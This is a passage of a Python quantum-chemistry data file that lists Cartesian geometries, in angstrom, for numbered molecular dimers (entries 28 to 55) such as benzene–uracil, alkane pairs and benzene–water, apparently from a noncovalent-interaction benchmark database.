C -0.40133116 1.46065642 3.89064637
H 0.03051760 2.42430654 4.12186267
C 0.39962023 0.34367712 3.67643246
H 1.47718940 0.41406140 3.73126697
C -0.22093167 -0.86497792 3.38277288
H 0.35484284 -1.76059980 3.19869795
C -1.61144595 -0.90301580 3.31732347
H -2.12029887 -1.83146918 3.08848079
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '28')] = qcdb.Molecule("""
0 1
C 0.82576911 1.23652484 -0.04025044
H 1.52101317 2.06312520 -0.08247145
C 1.30015992 -0.06294088 0.12725601
H 2.36365753 -0.24226113 0.20767420
C 0.40352312 -1.12855218 0.19824486
H 0.77375338 -2.13742677 0.32412109
C -0.96780949 -0.89519049 0.10313994
H -1.66520900 -1.71998342 0.16042745
C -1.44350838 0.40448328 -0.06244130
H -2.50751124 0.58550112 -0.12415016
C -0.54575549 1.46876875 -0.13624741
H -0.91422190 2.47742220 -0.26785516
--
0 1
N -0.27488064 0.67158742 3.21864568
H -0.64818803 1.57334885 2.95575271
C 1.11726604 0.59860052 3.35065902
O 1.80817636 1.59302421 3.20582496
C 1.59616616 -0.73547719 3.66876922
H 2.65321825 -0.88769313 3.80289036
C 0.71645693 -1.74985837 3.79498575
H 1.02238445 -2.75827898 4.03151011
N -0.62878896 -1.56482645 3.62489361
H -1.27753679 -2.32738539 3.72376278
C -1.20323727 -0.34002542 3.32547899
O -2.40102568 -0.18920215 3.18336680
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '29')] = qcdb.Molecule("""
0 1
N 1.21075533 0.02867578 0.32971111
C 0.61193497 -1.15844901 0.15345176
H 1.25147791 -2.02952340 0.21929295
C -0.75131399 -1.30864956 -0.08883407
H -1.17041577 -2.29686932 -0.21338320
C -1.54786767 -0.16994027 -0.15646691
H -2.61101275 -0.24595469 -0.33875574
C -0.94362237 1.07063612 0.01982310
H -1.51881431 1.98450028 -0.01164403
C 0.42771857 1.11610863 0.25734879
H 0.92469451 2.06805173 0.39754798
--
0 1
N -0.71316758 -0.28394932 3.29752332
H -1.60805660 -0.71581281 3.11291983
C -0.71291270 1.11386048 3.39053432
O -1.75279577 1.74206028 3.27568419
C 0.60658206 1.67294182 3.61809739
H 0.70789842 2.74016399 3.71396557
C 1.67645565 0.85424952 3.68961744
H 2.68033469 1.22291422 3.83804398
N 1.55839451 -0.50304375 3.57706278
H 2.37183050 -1.09523110 3.56889514
C 0.35794757 -1.15027617 3.35068108
O 0.26581032 -2.35569425 3.21710180
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '30')] = qcdb.Molecule("""
0 1
C 0.83551718 1.11516693 0.02140131
H 1.48432398 1.98060858 0.01953430
C 1.38327497 -0.16614721 0.02376531
H 2.45714902 -0.29520468 0.02277108
C 0.54755466 -1.28131632 0.02168563
H 0.97293610 -2.27580453 0.01977853
C -0.83552313 -1.11516159 0.02139907
H -1.48433419 -1.98060640 0.01953009
C -1.38328358 0.16615413 0.02375775
H -2.45715618 0.29520906 0.02275707
C -0.54756577 1.28132347 0.02168025
H -0.97294284 2.27580548 0.01976873
--
0 1
C 0.65578060 -0.11679048 3.53075174
H 1.04724138 -1.12390931 3.52628348
H 1.37085438 0.69327350 3.52625015
C -0.65577592 0.11679215 3.53076063
H -1.37084787 -0.69327237 3.52626454
H -1.04723903 1.12391105 3.52630243
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '31')] = qcdb.Molecule("""
0 1
N -0.05087365 -0.98008127 0.03396219
H -0.05322205 -1.99069374 0.04982167
C -1.30881316 -0.36187638 0.00402596
O -2.32722000 -1.03255492 -0.00582886
C -1.23681849 1.08804829 -0.01222440
H -2.15273897 1.65146044 -0.05477443
C -0.03519433 1.69783584 0.03370483
H 0.07036636 2.77247575 0.03188224
N 1.13452913 0.99028251 0.09184461
H 2.02372032 1.45677218 0.15569277
C 1.19318599 -0.39183287 0.11577512
O 2.23639797 -1.01118826 0.19418562
--
0 1
C 0.72600726 0.02505349 3.39819044
H 1.24312499 -0.84593440 3.02096384
H 1.33161826 0.81204754 3.82550477
C -0.60276924 0.12564394 3.34894351
H -1.21477213 -0.66183565 2.93204279
H -1.11459423 0.99671353 3.73294327
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '32')] = qcdb.Molecule("""
0 1
N -0.05545357 -0.94799090 0.01001028
H -0.05731609 -1.95771330 0.05505287
C -1.31395971 -0.33514498 -0.06458622
O -2.32889664 -1.00790087 -0.12310273
C -1.24835877 1.11605191 -0.06650860
H -2.16434937 1.67533298 -0.14710244
C -0.05308010 1.73142748 0.03419541
H 0.04811054 2.80642986 0.04341968
N 1.11592628 1.02759107 0.13516893
H 1.99665515 1.49727976 0.26162029
C 1.17534700 -0.35380470 0.17616616
O 2.21463146 -0.96646542 0.33517250
--
0 1
C 0.70785184 -0.17230221 3.27635136
H 1.70367011 -0.52628807 3.16213263
C -0.43675225 0.21415547 3.38254320
H -1.44163480 0.54285582 3.48290737
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '33')] = qcdb.Molecule("""
0 1
N 1.38138219 -0.00023348 0.13146374
C 0.67935079 -1.14023946 0.09207966
H 1.25871960 -2.05496223 0.12588361
C -0.70972232 -1.19311407 0.00666426
H -1.21408768 -2.14856163 -0.02530851
C -1.42161357 0.00013343 -0.04081690
H -2.50069615 0.00025757 -0.10916973
C -0.70940120 1.19317538 0.00652198
H -1.21351163 2.14874784 -0.02552831
C 0.67965167 1.13995623 0.09189303
H 1.25926073 2.05451090 0.12550248
--
0 1
C 0.01960458 0.66643934 3.48727228
H 0.93007858 1.22592506 3.32815744
H -0.88994292 1.22884357 3.64423278
C 0.01993726 -0.66624796 3.48740452
H 0.93067296 -1.22533044 3.32839408
H -0.88935083 -1.22907273 3.64449367
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '34')] = qcdb.Molecule("""
0 1
C -2.53330865 -0.29487907 0.71314876
H -2.56362682 -0.97708181 -0.13642264
H -2.56697835 -0.89587590 1.62173177
H -3.43442611 0.31595713 0.68410447
C -1.27188487 0.55765547 0.67435468
H -1.27102630 1.25656571 1.51431940
H -1.26663255 1.16789581 -0.23182653
C -0.00013504 -0.27841822 0.71960315
H -0.00015938 -0.88722952 1.62863709
H -0.00036543 -0.98071418 -0.11940439
C 1.27189476 0.55738219 0.67406108
H 1.27097175 1.25663331 1.51370541
H 1.26663649 1.16718250 -0.23238692
C 2.53340376 -0.29494176 0.71328015
H 2.56391919 -0.97777410 -0.13577836
H 3.43430956 0.31625432 0.68359945
H 2.56755821 -0.89520887 1.62232865
--
0 1
C 2.53355730 0.29502133 4.51309986
H 2.56814179 0.89482803 3.60377431
H 2.56406061 0.97822791 5.36184468
H 3.43423799 -0.31647598 4.54330880
C 1.27173110 -0.55686594 4.55240411
H 1.26628739 -1.16659365 5.45890107
H 1.27060059 -1.25621968 3.71282305
C -0.00004389 0.27923316 4.50678767
H -0.00019882 0.98154314 5.34577214
H 0.00003301 0.88800958 3.59771803
C -1.27180473 -0.55690882 4.55205921
H -1.26642249 -1.16701827 5.45830931
H -1.27069839 -1.25593171 3.71219555
C -2.53352396 0.29513749 4.51308150
H -2.56771726 0.89567116 3.60420474
H -3.43432593 -0.31616087 4.54259468
H -2.56406349 0.97772373 5.36234289
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '35')] = qcdb.Molecule("""
0 1
C -2.53038287 -0.41757533 0.68130643
H -2.55988603 -0.98278998 -0.25015619
H -2.55403625 -1.13386495 1.50265790
H -3.43621355 0.18414376 0.73677133
C -1.27615683 0.44363493 0.75002483
H -1.27808384 1.02521785 1.67508548
H -1.28033899 1.16855564 -0.06715806
C 0.00220470 -0.38071620 0.67899257
H 0.00782894 -1.11141304 1.49383122
H 0.00624866 -0.96052270 -0.24882046
C 1.26833347 0.46239635 0.74936913
H 1.26201986 1.04425029 1.67424645
H 1.26163488 1.18705711 -0.06803458
C 2.53496627 -0.38042469 0.68068636
H 2.57244024 -0.94571652 -0.25045186
H 3.43198117 0.23441492 0.73557772
H 2.56920771 -1.09581003 1.50245608
--
0 1
C -0.00052120 0.06397129 5.24130633
C 0.00055054 -0.07615981 6.76103928
H -0.88648549 0.38791623 7.19440870
H 0.00980204 -1.12694006 7.05404915
H 0.87921076 0.40350475 7.19468235
C -1.23997654 -0.61768074 4.66740782
H -1.26327576 -0.52872361 3.58057863
H -1.25206217 -1.67895713 4.92042102
H -2.15092026 -0.16538948 5.06249294
C 1.25208391 -0.59356951 4.66783599
H 1.27341069 -0.50528385 3.58086503
H 1.28521444 -1.65413035 4.92192831
H 2.15389614 -0.12292620 5.06225711
C -0.01476908 1.54376378 4.86668505
H 0.86299692 2.05435080 5.26564018
H -0.01529328 1.67021871 3.78303336
H -0.90287503 2.03709750 5.26447319
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '36')] = qcdb.Molecule("""
0 1
C 0.38252221 -0.07060697 0.76689582
C -1.04063947 0.39681125 1.06093593
H -1.77157460 -0.28150025 0.61833023
H -1.22471777 0.43573509 2.13551890
H -1.21406603 1.39372444 0.65309065
C 0.59084747 -1.46681814 1.34797791
H 1.60291380 -1.82295000 1.15010285
H 0.43896858 -1.46674598 2.42828668
H -0.10991906 -2.17868425 0.90931390
C 1.37826905 0.89843536 1.39914944
H 2.40439397 0.58544074 1.20073365
H 1.24378092 0.94597430 2.48070991
H 1.24837318 1.90502262 0.99895071
C 0.60196094 -0.11103419 -0.74309659
H 0.45921182 0.87703910 -1.18289819
H 1.61369399 -0.44345945 -0.97967210
H -0.09953078 -0.79754982 -1.21922069
--
0 1
C -0.37502842 0.06931363 5.96648833
C 1.04778403 -0.39965237 5.67308879
H 1.23222323 -0.43898152 4.59856833
H 1.77921818 0.27802046 6.11582437
H 1.22004770 -1.39665841 6.08120936
C -0.58142523 1.46587516 5.38565786
H -1.59338833 1.82286061 5.58250538
H 0.11949337 2.17694663 5.82537963
H -0.42831602 1.46607177 4.30551550
C -0.59532291 0.10948985 7.47634196
H -1.60653907 0.44376683 7.71241515
H 0.10718954 0.79443888 7.95318018
H -0.45475982 -0.87903049 7.91579370
C -1.37149114 -0.89846403 5.33334194
H -1.24256513 -1.90543941 5.73292091
H -2.39738024 -0.58469117 5.53172979
H -1.23678678 -0.94543842 4.25176527
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '37')] = qcdb.Molecule("""
0 1
C 0.79991408 -1.02205164 0.68773696
H 0.85355588 -1.12205101 -0.39801435
H 1.49140210 -1.74416936 1.11972040
C 1.11688700 0.42495279 1.09966205
H 1.83814230 0.89014504 0.43045256
H 1.55556959 0.43982464 2.09708356
C -0.24455916 1.16568959 1.10297714
H -0.25807760 2.00086313 0.40532333
H -0.44880450 1.57699582 2.09098447
C -1.29871418 0.10381191 0.73930899
H -1.47356078 0.10524338 -0.33800545
H -2.25673428 0.27804118 1.22715843
C -0.64687993 -1.22006836 1.13630660
H -1.12443918 -2.08762702 0.68299327
H -0.68601864 -1.34528332 2.22022006
--
0 1
C 0.04984615 0.09420760 5.61627735
C -0.04649805 -0.05787837 7.13191782
H 0.94604832 -0.07334458 7.58427505
H -0.60542282 0.77000613 7.57035274
H -0.55366275 -0.98654445 7.39726741
C 0.76389939 1.40111272 5.28065247
H 0.84541894 1.53461185 4.20097059
H 0.22042700 2.25580115 5.68615385
H 1.77150393 1.41176313 5.69888547
C -1.35516567 0.11403225 5.01895782
H -1.31823408 0.23122219 3.93510886
H -1.93746520 0.94145581 5.42730374
H -1.88506873 -0.81375459 5.24028712
C 0.83774596 -1.07927730 5.03893917
H 0.34252564 -2.02626804 5.25918232
H 0.93258913 -0.99209454 3.95580439
H 1.84246405 -1.11668194 5.46268763
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '38')] = qcdb.Molecule("""
0 1
C 0.95688019 -0.89184563 1.14195000
H 1.50456597 -1.27835762 0.28342019
H 1.42138447 -1.31477793 2.03102546
C 0.99094943 0.65850830 1.14550384
H 1.51059446 1.02309646 0.25994788
H 1.51625823 1.05981813 2.01053703
C -0.47945194 1.10231879 1.10387910
H -0.61626861 2.06487722 0.61356737
H -0.87474223 1.18907144 2.11806960
C -1.18210650 -0.05279656 0.39334575
H -0.94888216 -0.02683030 -0.67380459
H -2.26566452 -0.03356474 0.50127403
C -0.53065958 -1.27488954 1.03930959
H -0.69039061 -2.19702093 0.48299221
H -0.95084939 -1.41541197 2.03674782
--
0 1
C -1.13198517 -0.38391856 5.05596626
H -1.46511966 -0.14721994 4.04338190
H -1.93677357 -0.92701702 5.54895277
C 0.18162128 -1.17946347 5.00820507
H 0.23156623 -1.83720616 4.14207124
H 0.26190891 -1.81082110 5.89259036
C 1.31093651 -0.11675764 5.00880116
H 1.93220146 -0.17743649 4.11692754
H 1.96834600 -0.26664069 5.86420633
C 0.60076314 1.24491110 5.11666799
H 0.42089996 1.65340289 4.12066887
H 1.18114710 1.97931461 5.67264126
C -0.74128932 0.91043867 5.76647985
H -1.48095789 1.70295043 5.66159855
H -0.60124939 0.71879862 6.83302881
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '39')] = qcdb.Molecule("""
0 1
C 0.76554546 0.86824433 0.82099095
H 1.43747647 1.68000664 1.06510281
C 1.23765260 -0.44283807 0.79388795
H 2.27575877 -0.64853808 1.01771141
C 0.37223723 -1.48853667 0.47726862
H 0.73818789 -2.50608012 0.45705609
C -0.96493318 -1.22297162 0.18687834
H -1.63645949 -2.03456079 -0.05777362
C -1.43706509 0.08840558 0.21327714
H -2.47468432 0.29430216 -0.01146746
C -0.57190649 1.13402416 0.53081281
H -0.93769935 2.15171058 0.55107764
--
0 1
C -0.76345318 -0.72677383 4.05982770
H -0.86970702 -0.55182467 2.98752083
H -1.41509075 -1.55603772 4.33297836
C 0.70608801 -0.98383692 4.40395757
H 1.20131879 -1.62142197 3.67337330
H 0.76936719 -1.48405069 5.37142421
C 1.34622506 0.42155976 4.49491043
H 1.99649337 0.61423069 3.64305751
H 1.95909224 0.51072918 5.39063579
C 0.16717893 1.42073677 4.52178247
H 0.05002744 1.87970717 3.53949713
H 0.31277252 2.22224160 5.24418107
C -1.06659283 0.56364158 4.81743133
H -1.99758134 1.03937903 4.51151819
H -1.13201859 0.35432067 5.88796657
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '40')] = qcdb.Molecule("""
0 1
C 0.31195353 0.56102334 0.49669886
H 0.74213608 1.55336911 0.48156571
C 1.14218235 -0.55807461 0.53606185
H 2.21651131 -0.43425014 0.55235015
C 0.58780415 -1.83668705 0.55414435
H 1.23191239 -2.70484153 0.58522179
C -0.79665772 -1.99637562 0.53296300
H -1.22677442 -2.98844427 0.54863708
C -1.62689297 -0.87747365 0.49416828
H -2.70112211 -1.00134997 0.47981498
C -1.07266525 0.40120590 0.47597397
H -1.71697357 1.26940117 0.44591995
--
0 1
C 0.17046797 0.50613197 4.83469402
C 1.61671665 0.68491933 4.37973254
H 2.03257337 1.61819721 4.76315552
H 2.24011597 -0.13569629 4.73858640
H 1.67732578 0.70431062 3.29079832
C 0.11607660 0.47476083 6.35955934
H -0.90971343 0.34734041 6.70864711
H 0.71148250 -0.35092603 6.75211308
H 0.50437108 1.40264546 6.78246492
C -0.37891207 -0.80336000 4.27439800
H -1.41378567 -0.95363504 4.58706959
H 0.20754451 -1.65233376 4.63020927
H -0.35013224 -0.80381278 3.18408376
C -0.67090481 1.67070366 4.31848855
H -0.64936386 1.70673405 3.22848999
H -1.71069396 1.56693409 4.63297103
H -0.29525222 2.62139813 4.70059546
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '41')] = qcdb.Molecule("""
0 1
N -0.20890478 -0.96458262 0.53476104
H -0.22415099 -1.97310940 0.60508386
C -1.44634208 -0.34458112 0.30665858
O -2.46123675 -1.01079161 0.19789196
C -1.35778219 1.10318559 0.22814378
H -2.25657214 1.66773071 0.04984731
C -0.16300320 1.70989257 0.38112632
H -0.04629046 2.78244591 0.33334968
N 0.98545210 1.00082412 0.61120636
H 1.86755978 1.46692777 0.74478430
C 1.02702092 -0.37917011 0.71264723
O 2.04919670 -0.99739548 0.93725979
--
0 1
C 1.14141247 2.35703152 4.05707817
H 0.71056385 2.66808022 3.10429560
H 0.50717856 2.76246464 4.84532582
H 2.12429249 2.81747894 4.15019966
C 1.21442893 0.83816057 4.14659651
H 1.64481257 0.54859772 5.10788747
H 1.88901852 0.44700002 3.38147835
C -0.15035626 0.17999392 3.99177975
H -0.82160052 0.54886973 4.77339899
H -0.59782713 0.49025894 3.04187953
C -0.09406732 -1.34069263 4.05141525
H 0.32953817 -1.64312304 5.01205144
H 0.59745442 -1.70257157 3.28691282
C -1.46335024 -1.98256584 3.86764160
H -1.90172924 -1.70910816 2.90745609
H -1.40641145 -3.06933423 3.91169879
H -2.15131302 -1.65421986 4.64687465
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '42')] = qcdb.Molecule("""
0 1
N 0.19572959 -0.84468925 0.82384642
H 0.45039753 -1.79675294 1.04976794
C -1.17904919 -0.57368440 0.75948349
O -1.99364624 -1.45626526 0.96690066
C -1.47671471 0.81115567 0.43755952
H -2.50635592 1.11565059 0.36389469
C -0.46811280 1.68296245 0.23489084
H -0.63843522 2.72164296 -0.00616410
N 0.84562854 1.30599113 0.32683051
H 1.58969256 1.96887924 0.18595979
C 1.25426147 0.01946187 0.63624397
O 2.42230438 -0.30171639 0.73187948
--
0 1
C 1.05672314 -0.86351031 4.39874366
H 1.51057565 -0.95556655 3.41076111
H 1.60122564 -1.52749058 5.06794134
C 1.11103661 0.60244169 4.83167965
H 2.06932660 1.07534062 4.62095536
H 0.92292133 0.68407923 5.90490278
C -0.05631497 1.21525617 4.06090845
H 0.21798930 1.30403777 3.00743682
H -0.34072939 2.20639729 4.41254246
C -1.17325946 0.17768426 4.23193676
H -1.89879874 0.20129811 3.42056485
H -1.71734509 0.38238141 5.15418538
C -0.45022312 -1.18886357 4.33559365
H -0.69288766 -1.83301970 3.49223397
H -0.76532935 -1.71626599 5.23468007
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '43')] = qcdb.Molecule("""
0 1
N 0.62608128 -0.85091265 0.80591569
H 0.40918989 -1.81150056 1.03440142
C -0.43245619 -0.08733581 0.29466376
O -1.53077162 -0.58840313 0.12359257
C -0.06687462 1.29127521 0.01963739
H -0.80974352 1.95181039 -0.39283965
C 1.18354208 1.71793501 0.29053321
H 1.50185022 2.73387064 0.10983284
N 2.13412979 0.88660160 0.81908177
H 3.05533594 1.22390137 1.04342778
C 1.90278319 -0.44317844 1.12831175
O 2.74380631 -1.16392354 1.62858730
--
0 1
C -0.62370220 -0.02971796 4.73188916
C -1.94044838 0.71157084 4.94676206
H -2.64751979 0.09336465 5.50162440
H -1.78094882 1.63175538 5.51094708
H -2.39815816 0.97306786 3.99160840
C -0.00826558 -0.38315588 6.08316660
H 0.93489659 -0.91552919 5.95238477
H 0.18875537 0.51658585 6.66796874
H -0.67955960 -1.02089289 6.65990335
C 0.34142207 0.86375986 3.95610006
H 1.28999256 0.35116515 3.78574607
H 0.54671227 1.78189631 4.50952643
H -0.08097331 1.14224647 2.98863562
C -0.88501939 -1.30975236 3.94152426
H -1.34875779 -1.08791865 2.97889962
H 0.04755691 -1.84815128 3.76188758
H -1.55552720 -1.97156632 4.49170918
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '44')] = qcdb.Molecule("""
0 1
C 0.66640038 0.18381078 0.41973683
H 1.22888182 -0.32988301 1.18625971
H 1.22803556 0.69720813 -0.34760989
C -0.66597358 0.18297343 0.41961191
H -1.22792171 -0.33149890 1.18610334
H -1.22818427 0.69564575 -0.34774808
--
0 1
C -2.53275995 -0.39365922 4.14534248
H -2.56225339 -1.00668000 3.24415261
H -2.56889390 -1.06787984 5.00095950
H -3.43393131 0.21735721 4.16258843
C -1.27132347 0.45901620 4.18116042
H -1.27172933 1.07910977 5.08055437
H -1.26293512 1.14592451 3.33210001
C -0.00004920 -0.37854138 4.15421721
H -0.00020326 -1.06521408 5.00604923
H 0.00009186 -1.00611921 3.25757472
C 1.27117120 0.45904505 4.18162175
H 1.27144420 1.07885580 5.08110716
H 1.26297638 1.14611970 3.33271412
C 2.53262258 -0.39367946 4.14579757
H 2.56224605 -1.00653596 3.24448839
H 3.43380069 0.21725671 4.16337561
H 2.56854094 -1.06813554 5.00130328
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '45')] = qcdb.Molecule("""
0 1
C -0.60618936 0.05587406 0.58900491
H -1.66803667 0.05577624 0.58901162
C 0.60584873 0.05554087 0.58926624
H 1.66767817 0.05486328 0.58972794
--
0 1
C -2.53040391 -0.34745600 4.21851416
H -2.53877054 -1.00940954 3.35210357
H -2.58232224 -0.97372522 5.10910493
H -3.43281853 0.26144806 4.18575253
C -1.26987178 0.50714472 4.22958343
H -1.28652345 1.18014394 5.08999255
H -1.24460479 1.14136072 3.34078732
C 0.00004684 -0.33118629 4.27003876
H 0.00004957 -0.94897593 5.17310016
H 0.00011393 -1.01948544 3.42079757
C 1.26994540 0.50718978 4.22967030
H 1.28657322 1.18015690 5.09009161
H 1.24480048 1.14136210 3.34086911
C 2.53046789 -0.34744680 4.21872389
H 2.53884766 -1.00942955 3.35234481
H 3.43284666 0.26148455 4.18599753
H 2.58228512 -0.97366153 5.10935743
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '46')] = qcdb.Molecule("""
0 1
C 1.37219093 1.01247736 0.97082468
H 0.95217623 2.01404955 1.03311725
H 1.94742170 0.92651560 0.05071776
H 2.05170208 0.85182517 1.80295247
C 0.32673706 -0.07764727 0.98819876
O 0.61882128 -1.25248130 1.17128126
N -0.95002884 0.34488680 0.77391491
H -1.10467156 1.32202550 0.60611216
C -2.05985440 -0.57736895 0.68015349
H -1.66935602 -1.56679601 0.89718425
H -2.83459176 -0.33138032 1.40366139
H -2.49097050 -0.57892483 -0.31993926
--
0 1
C 2.66066552 0.46274539 4.85334645
H 2.77750480 1.21716129 4.07460163
H 2.57455515 0.98763172 5.80500251
H 3.57275696 -0.13149652 4.88015446
C 1.43239329 -0.40064212 4.59579490
H 1.33782394 -1.14609612 5.38884574
H 1.54881342 -0.95410645 3.66195110
C 0.14985545 0.41797183 4.53049355
H 0.03828513 0.99570671 5.45357719
H 0.22908959 1.15078674 3.72084090
C -1.09450084 -0.43236340 4.31361365
H -1.18530281 -1.14684989 5.13503088
H -0.96669384 -1.02130113 3.40339920
C -2.36133934 0.40792810 4.22349893
H -2.29442610 1.11497908 3.39572969
H -3.24668156 -0.20808939 4.06966602
H -2.51169538 0.98413919 5.13671852
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '47')] = qcdb.Molecule("""
0 1
C 0.72918867 1.11310122 0.32672825
H 1.30321590 2.01422234 0.15916027
C 1.37508737 -0.11936635 0.41277695
H 2.45051474 -0.17462400 0.31330720
C 0.63503981 -1.28055339 0.62938541
H 1.13633448 -2.23601747 0.70021716
C -0.75098563 -1.20965430 0.75789034
H -1.32452590 -2.11141283 0.92419891
C -1.39703443 0.02267081 0.67308963
H -2.47242537 0.07848826 0.77399799
C -0.65689731 1.18429622 0.45833859
H -1.15782845 2.14058713 0.39509608
--
0 1
C 0.15810619 0.15289032 4.08588285
H 0.28023260 0.37837378 3.03545641
C -0.93297537 -0.60200829 4.51321912
H -1.65347990 -0.95852255 3.78952470
C -1.09367536 -0.89613361 5.86616918
H -1.94078294 -1.48210218 6.19641672
C -0.16179279 -0.43508023 6.79466326
H -0.28568629 -0.66304639 7.84467076
C 0.92979230 0.32002182 6.36942298
H 1.65291139 0.67785500 7.08980563
C 1.08859620 0.61350684 5.01593166
H 1.93585412 1.19958163 4.68588434
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '48')] = qcdb.Molecule("""
0 1
N 1.32276272 -0.01037598 1.01918373
C 0.65128601 -1.14899203 0.79680119
H 1.20041842 -2.06552808 0.97367282
C -0.67268130 -1.19471172 0.36665693
H -1.15719362 -2.14732141 0.20646407
C -1.34719676 0.00313399 0.15214401
H -2.37535653 0.00840542 -0.18229302
C -0.66455797 1.19409062 0.37900199
H -1.14262633 2.15155765 0.22872051
C 0.65889576 1.13497854 0.80885987
H 1.21410272 2.04591045 0.99543831
--
0 1
N 0.45011507 0.00130104 6.78095972
C 1.32078309 -0.00431175 5.76154669
H 2.36863966 -0.00306323 6.03584948
C 0.94739735 -0.01137951 4.41971862
H 1.69485802 -0.01554353 3.63861897
C -0.40865120 -0.01279358 4.10730315
H -0.73837988 -0.01824905 3.07702170
C -1.32675447 -0.00707849 5.15247277
H -2.39120450 -0.00792788 4.96373698
C -0.85115066 -0.00016084 6.46143162
H -1.54333433 0.00442229 7.29462282
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '49')] = qcdb.Molecule("""
0 1
C 0.84507720 1.05791869 0.69945490
H 1.50640601 1.90322178 0.83338235
C 1.37550931 -0.21745534 0.51116093
H 2.44718367 -0.36147258 0.50285232
C 0.52406810 -1.30704432 0.33319233
H 0.93572726 -2.29602641 0.18492305
C -0.85771573 -1.12146341 0.34638409
H -1.51838119 -1.96645805 0.20836325
C -1.38804570 0.15363438 0.53761349
H -2.45971752 0.29741587 0.55003229
C -0.53661315 1.24342221 0.71273882
H -0.94892427 2.23280628 0.85736635
--
0 1
N 0.02311730 0.35202455 6.77454464
C 0.17780112 1.28998616 5.82966776
H 0.31957195 2.30251216 6.18756949
C 0.16359185 1.02269639 4.46316833
H 0.29383191 1.82372219 3.74928292
C -0.02074646 -0.28893329 4.03787790
H -0.03731291 -0.53205196 2.98452996
C -0.18259538 -1.27396762 5.00673698
H -0.32913840 -2.30917859 4.73196547
C -0.15339291 -0.90663452 6.34982649
H -0.27698904 -1.65414849 7.12392749
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '50')] = qcdb.Molecule("""
0 1
C 0.83661195 1.11485600 0.23100790
H 1.48545250 1.97968049 0.21470491
C 1.38418781 -0.16696533 0.26005688
H 2.45768419 -0.29628753 0.26605977
C 0.54747934 -1.28184652 0.28693051
H 0.97191784 -2.27597918 0.31387670
C -0.83666710 -1.11500365 0.28456279
H -1.48555353 -1.97956851 0.30969784
C -1.38416274 0.16685015 0.25560540
H -2.45764469 0.29645927 0.25854055
C -0.54749833 1.28174826 0.22897743
H -0.97214124 2.27600137 0.21116093
--
0 1
C 0.00585466 0.07515017 3.77945155
H 0.00284553 0.05759463 2.71537604
C 0.00951511 0.09473103 4.99182772
H 0.01262752 0.11190396 6.05302473
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '51')] = qcdb.Molecule("""
0 1
C -0.60172996 -0.02857012 0.38493492
H -1.66373543 -0.02852657 0.37901431
C 0.61010917 -0.02866364 0.38816379
H 1.67213544 -0.02879308 0.38796752
--
0 1
C -0.00735998 0.10033739 4.14281190
H -0.00396560 0.06660234 3.07951502
C -0.01129640 0.13862741 5.35427728
H -0.01456263 0.17200329 6.41518870
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '52')] = qcdb.Molecule("""
0 1
C 0.96408039 0.87509331 0.37801364
H 1.65982961 1.69993082 0.44604227
C 1.43105709 -0.41313344 0.11899152
H 2.48952453 -0.58720917 -0.01701261
C 0.53412766 -1.47763890 0.04241755
H 0.89696129 -2.47738839 -0.15201199
C -0.83032682 -1.25360409 0.22085611
H -1.52576001 -2.07962435 0.16411655
C -1.29758715 0.03441261 0.48024263
H -2.35439607 0.20801612 0.62856096
C -0.40044509 1.09977921 0.56160137
H -0.76045514 2.09376880 0.78475698
--
0 1
C -0.11985517 0.53438939 4.36008118
O -0.58804476 1.58383601 3.98082079
O 0.28335741 -0.44317387 3.52079591
H 0.11465259 -0.11726029 2.61939066
C 0.09009913 0.13740231 5.79148697
H -0.21986702 0.94673889 6.44147585
H -0.48598160 -0.75922167 6.00843808
H 1.13859655 -0.09872978 5.95650555
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '53')] = qcdb.Molecule("""
0 1
C 0.85556074 0.35853244 1.04975426
H 1.51382550 0.90267956 1.71276582
C 1.34289713 -0.67537866 0.25115740
H 2.39288384 -0.93334472 0.28196305
C 0.47780661 -1.37670110 -0.58781577
H 0.85608399 -2.17890753 -1.20682428
C -0.87482983 -1.04255615 -0.63045178
H -1.54540573 -1.58570014 -1.28241614
C -1.36239729 -0.00701391 0.16584645
H -2.41157102 0.25346723 0.13077885
C -0.49844404 0.69315695 1.00699199
H -0.86611090 1.49033989 1.63803696
--
0 1
C 0.08192937 0.49753072 4.80472861
O 0.32841872 1.54095697 4.21748933
N -0.22211788 -0.65747581 4.15356127
H -0.19691756 -0.66449114 3.14692466
H -0.37789436 -1.51296813 4.64926298
C 0.10477407 0.40263889 6.31314609
H 1.13648787 0.48685118 6.64821988
H -0.31712984 -0.52400410 6.69417176
H -0.44469059 1.24648520 6.71991660
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '54')] = qcdb.Molecule("""
0 1
C 0.78014717 -0.60991473 -1.20755689
H 0.89619160 -1.13763959 -2.14414463
C 0.47794275 0.75099363 -1.20789541
H 0.35696423 1.27816780 -2.14405407
C 0.32728928 1.43186787 -0.00000000
H 0.09146503 2.48713922 0.00000000
C 0.47794275 0.75099363 1.20789541
H 0.35696423 1.27816780 2.14405407
C 0.78014717 -0.60991473 1.20755689
H 0.89619160 -1.13763959 2.14414463
C 0.93164831 -1.28998134 0.00000000
H 1.16848573 -2.34521369 -0.00000000
--
0 1
O -2.74383121 -0.26926257 0.00000000
H -2.57902721 -1.21398410 0.00000000
H -1.85653027 0.10232776 0.00000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '55')] = qcdb.Molecule("""
0 1
